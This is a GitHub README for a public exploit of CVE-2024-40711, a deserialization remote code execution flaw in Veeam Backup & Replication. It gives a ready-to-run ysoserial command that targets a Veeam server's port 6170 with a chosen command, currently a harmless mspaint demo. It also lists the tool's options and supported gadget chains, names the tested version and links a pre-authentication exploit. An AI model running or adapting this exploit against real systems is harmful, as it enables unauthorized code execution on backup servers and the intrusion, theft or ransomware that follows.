Skip to content

realstatus/CVE-2024-40711-Exp

Repository files navigation

Usages

.\ysoserial.exe -f BinaryFormatter -g Veeam -c {localhostServer} -vi {targetIP} -vp 6170 -vg DataSet -vc "cmd /c mspaint.exe"
Usage: ysoserial.exe [options]                                                                                                        
Options:                                                                                                                              
      --vi, --targetveeamip=VALUE                                                                                                     
                             The target Veeam Backup and reaplication IP                                                              
                               address                                                                                                
      --vp, --targetveeamport=VALUE                                                                                                   
                             The target Veeam Backup and reaplication port                                                            
                               (default: 6170)                                                                                        
      --vc, --veeamexpcmd=VALUE                                                                                                       
                             The target Veeam Backup and reaplication what                                                            
                               commands will be executed                                                                              
      --vg, --veeamgadget=VALUE                                                                                                       
                             The target Veeam Backup and reaplication what                                                            
                               gadget will be use (default: DataSet)                                                                  
           

cve-2024-4711

Other gadget

Supported gadgets are: ActivitySurrogateDisableTypeCheck , ActivitySurrogateSelector , ActivitySurrogateSelectorFromFile , AxHostState , BaseActivationFactory , ClaimsIdentity , ClaimsPrincipal , DataSet , DataSetOldBehaviour , DataSetOldBehaviourFromFile , DataSetTypeSpoof , Generic , GenericPrincipal , GetterCompilerResults , GetterSecurityException , GetterSettingsPropertyValue , ObjectDataProvider , ObjRef , PSObject , ResourceSet , RolePrincipal , SessionSecurityToken , SessionViewStateHistoryItem , TextFormattingRunProperties , ToolboxItemContainer , TypeConfuseDelegate , TypeConfuseDelegateMono , Veeam , WindowsClaimsIdentity , WindowsIdentity , WindowsPrincipal , XamlAssemblyLoadFromFile , XamlImageInfo

But you must use Gadget to support SOAPFORMATTER

Test environment

Veeam Backup 12.1.1.56

Reference

watchtowrlabs/CVE-2024-40711: Pre-Auth Exploit for CVE-2024-40711 (github.com)

Veeam Backup & Response - RCE With Auth, But Mostly Without Auth (CVE-2024-40711) (watchtowr.com)